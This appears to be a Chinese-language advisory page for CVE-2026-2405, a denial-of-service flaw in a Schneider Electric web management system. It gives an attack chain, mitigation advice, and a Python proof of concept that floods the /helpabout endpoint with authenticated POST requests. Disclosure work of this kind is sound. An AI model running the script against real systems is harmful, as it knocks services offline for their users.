CVE-2026-2405 CVSS 6.5 中危

CVE-2026-2405 资源耗尽导致拒绝服务漏洞

披露日期: 2026-04-14

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-2405

漏洞类型

拒绝服务

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Schneider Electric Web 管理系统

漏洞概述

该漏洞属于资源消耗未受控类型（CWE-400）。当具有Web管理员权限的用户向系统发送大量POST /helpabout请求时，会触发系统生成过量的故障排除zip文件，导致资源耗尽并引发拒绝服务。

技术细节

漏洞原理在于系统对特定接口的资源分配缺乏有效限制。攻击者需具备低权限的Web管理员账户，利用网络向/helpabout端点发送高频POST请求。系统在处理每个请求时尝试创建故障排查压缩包，这种未受控的文件I/O操作和CPU占用会迅速耗尽服务器资源。虽然该漏洞不影响数据的机密性和完整性，但会导致服务可用性严重下降，且利用无需用户交互。

攻击链分析

STEP 1

侦察与认证

攻击者获取目标系统的Web管理员低权限账户，并识别出/helpabout接口存在资源消耗问题。

STEP 2

资源耗尽攻击

攻击者利用脚本或工具向/helpabout接口发送大量POST请求，触发系统生成故障排除压缩包。

STEP 3

拒绝服务

系统资源（CPU/磁盘I/O）被大量占用，无法响应正常用户的请求，导致服务不可用。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Configuration
target_url = "http://target-ip/helpabout"
username = "admin"
password = "password"

# Create session to simulate authenticated Web Admin user
session = requests.Session()
login_payload = {
    "username": username,
    "password": password
}

# Login (Adjust endpoint based on actual application logic)
# session.post("http://target-ip/login", data=login_payload)

print("Starting DoS attack by flooding /helpabout...")

try:
    while True:
        # Send POST requests to trigger excessive zip file creation
        response = session.post(target_url)
        if response.status_code == 200:
            print(f"Request sent, system generating zip file...")
        else:
            print(f"Received status code: {response.status_code}")
except KeyboardInterrupt:
    print("Attack stopped by user.")
except Exception as e:
    print(f"An error occurred: {e}")

影响范围

请参考官方通告 SEVD-2026-104-01 确认受影响版本

防御指南

临时缓解措施

建议立即限制对/helpabout端点的访问权限，仅允许可信IP访问，或在网络层面限制单个IP的并发连接数和请求速率，直到应用补丁。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表